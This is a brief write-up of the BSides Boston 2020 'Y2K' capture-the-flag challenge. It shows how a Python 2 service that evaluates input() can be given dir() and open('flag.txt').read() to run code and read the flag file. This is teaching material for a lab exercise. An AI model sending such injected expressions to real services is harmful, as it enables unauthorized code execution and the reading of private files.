BSides Boston 2020: Y2K

---

Challenge

Prompt:

We are given a netcat command, and when we connect we get the prompt:

	What year do YOU think the world will end?
	

We can give it an integer value and it spits it back:

	Yeah! I agree with you! I also think the world will end in the year
	1234
	

Providing a non-integer output throws an error:

	Traceback (most recent call last):
	  File "/home/challenge/server.py", line 4, in <module>
	    end = input()
	  File "<string>", line 1, in <module>
	NameError: name 'a' is not defined
	

So we are dealing with a python script and it is trying to reference our input. Lets give it a command!

	What year do YOU think the world will end?
	dir()
	Yeah! I agree with you! I also think the world will end in the year
	['__builtins__', '__doc__', '__file__', '__name__', '__package__']
	

We have code execution. Fantastic. Let’s see if we can read files…

	What year do YOU think the world will end?
	open('flag.txt').read()
	Yeah! I agree with you! I also think the world will end in the year
	flag{we_are_saved_from_py2_k}